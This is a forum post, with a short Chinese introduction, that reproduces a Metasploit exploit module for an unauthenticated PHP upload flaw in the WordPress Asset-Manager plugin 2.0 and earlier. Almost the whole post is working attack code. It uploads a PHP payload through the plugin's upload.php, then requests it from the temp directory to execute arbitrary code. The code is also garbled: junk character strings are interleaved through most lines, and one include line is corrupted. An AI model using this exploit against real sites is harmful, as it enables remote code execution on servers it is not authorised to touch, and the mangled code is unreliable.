这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
4 p* B0 n$ |. ?/ r) D w# t: [
+ ^' B; ]. Q& j##% `2 i" X, e4 v$ H
# This file is part of the Metasploit Framework and may be subject to8 r% J, T$ g! C" T
# redistribution and commercial restrictions. Please see the Metasploit# I! h. |5 @' S. B5 d/ w+ E0 [. d+ j: C
# Framework web site for more information on licensing and terms of use.& M- G: L) S7 W7 K: {
# http://metasploit.com/framework/
q% w3 G- t& L##' Y# a2 z$ G% E, V+ W$ v2 Q B- e! B
, l+ u& v% W- K, o$ [4 l
require 'msf/core'
% a* X6 J# C$ u" Crequire 'msf/core/exploit/php_exe'; v" d3 R# l' o& X+ b; L" @' p$ D5 {
% ~5 M/ @ a7 p0 ^) u
class Metasploit3 < Msf::Exploit::Remote& x2 s! j/ J! N/ [
Rank = ExcellentRanking
0 x% S4 ?* H: H7 ^% p3 v* p " N# V0 Z$ D; w* a' @' i- V
include Msf::Exploit::Remote::HttpClient
; H2 I/ J' f( e/ }* |8 w include Msf::Exploit: hpEXE
' r* @+ x ?: c4 [: d3 V
, H) F4 f) s) g5 G- K4 ~2 Y- ] def initialize(info = {})0 z) F( E, e L& B" B
super(update_info(info,
, i5 J% A! q) u# c% X 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',9 T1 y3 v V; }1 _
'Description' => %q{
! p! ], ~: b: O# ^ This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress) D, A! w, C/ }6 E
plugin. By abusing the upload.php file, a malicious user can upload a file to a: S, ]+ }& I. g* c/ R3 m
temp directory without authentication, which results in arbitrary code execution.9 Y; O4 q7 K( Y) I* M: i0 `
},
9 O' q9 o& C/ t0 w' F 'Author' =>, d& U; v. z0 B) K' U% m% j
[
9 l# V$ {1 @1 B( Y* W2 \% q# p 'Sammy FORGIT', # initial discovery2 G! y$ J* c4 d; V# H' ~* g8 k
'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ i1 X; Y2 v! i# l4 `5 S3 d; ~
],
: n7 {5 b/ W0 `; U 'License' => MSF_LICENSE,
4 K5 H0 ~' U$ k5 P9 M 'References' =>6 I4 a1 V- L$ Y$ O% X* [
[
3 U/ z! X5 r$ C) Z$ ? [ 'OSVDB', '82653' ],3 X' V( G% Q c& o
[ 'BID', '53809' ],
' `7 \7 |. z2 u" u [ 'EDB', '18993' ],
7 G" Z# g; d- ^! J* G# ^( H [ 'URL', 'http:// www.myhack58.com /' ]2 B- L: R2 n* z6 v/ }2 }3 s
],
J- }* d/ c9 q9 o 'Payload' =>
2 }: I# ?0 C. L" J+ V7 z! \ {
3 H3 c' p8 A O$ B* E! m 'BadChars' => "\x00",* }3 W2 N1 i+ K
},( A0 x- z1 J6 o% ^5 R0 d
'Platform' => 'php',7 U8 r! S: j& z+ Y [
'Arch' => ARCH_PHP,
d0 p7 _8 D4 M- N& H/ {/ q 'Targets' =>. s9 j# U# O& @. T u" a
[
* H. s: `4 ~/ Y. c1 E1 T [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
4 C m0 I: L0 V1 Q) S [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
2 Y4 {6 k' Q& F8 A, b3 E ],7 {1 Y2 F$ z* V$ ]
'DefaultTarget' => 0,
6 h+ e1 ?- L2 P/ y 'DisclosureDate' => 'May 26 2012'))
9 o8 i: s( Y- |$ @. X3 ^ " v0 z! @) d l& ~& \& t' L( f
register_options(# f$ c0 j8 {8 [5 a
[! {: B- n/ Q3 d" H1 t
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])6 G" z/ B' q! H
], self.class)
2 \" c( e* l3 j( d, C end" C% S/ d7 c: U7 y) D
/ Z- q" {# V( g: @' V
def exploit
; o; c* `7 U( Y uri = target_uri.path d5 o6 }7 F- v. p4 ?1 o9 l
uri << '/' if uri[-1,1] != '/'7 e# Z/ Q& O. i6 z4 X: `
peer = "#{rhost}:#{rport}"
, \7 c% Y x/ w) d* f- W+ k% } payload_name = "#{rand_text_alpha(5)}.php"
2 I1 ~. B+ X G php_payload = get_write_exec_payload(:unlink_self=>true)
( _5 k1 K' R& i8 s) Y ` $ K" U9 t! @1 N
data = Rex::MIME::Message.new1 j# U& U* i7 q6 o, S
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
* V2 \4 n% g7 E3 P3 j) G post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
% B/ H+ I& x- S- f
: U- d* P0 B- m' ` print_status("#{peer} - Uploading payload #{payload_name}")( x( U1 q7 l" m: I2 l* y
res = send_request_cgi({& H, |* X8 a, H0 d* W0 j5 f
'method' => 'POST',9 B8 g/ m6 x7 d$ r& J3 m( b5 d
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",. Z0 P' Q2 U* B7 ^6 K
'ctype' => "multipart/form-data; boundary=#{data.bound}",! c( _ E% z& }% j
'data' => post_data. O; [5 A/ Y4 m8 o6 z+ \: ~- O
})4 p- G) V* W, K
c2 M3 C4 _& R5 L
if not res or res.code != 200 or res.body !~ /#{payload_name}/
: [3 J( e8 G$ i7 v7 j! M fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ `2 O' P9 ~4 }end y( R4 f0 H7 n- l4 b. R
( n# \' ]4 t' p. J; _0 z* Q print_status("#{peer} - Executing payload #{payload_name}")4 S8 Z% j# ?2 K# D; u
res = send_request_raw({
! W* D9 u3 ~. E1 s5 G 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",# `# [9 R. G; Q r
'method' => 'GET'
$ s% ?+ L; i8 {+ T* t7 s# C })
" g0 Y0 R3 j; j. b! I
" }+ n# C6 s! K0 g* x* v if res and res.code != 200
$ L/ X6 x' g( u! A5 [( K5 m9 p fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
4 s4 z5 o, @2 Y+ { end
7 i9 @3 _% d7 Y8 e, B l end
* d0 m# h8 ]2 l! Xend5 F5 k, c. L* ]& N) D4 y$ X
|
发表于 2012-12-31 09:22:33
收藏
支持
反对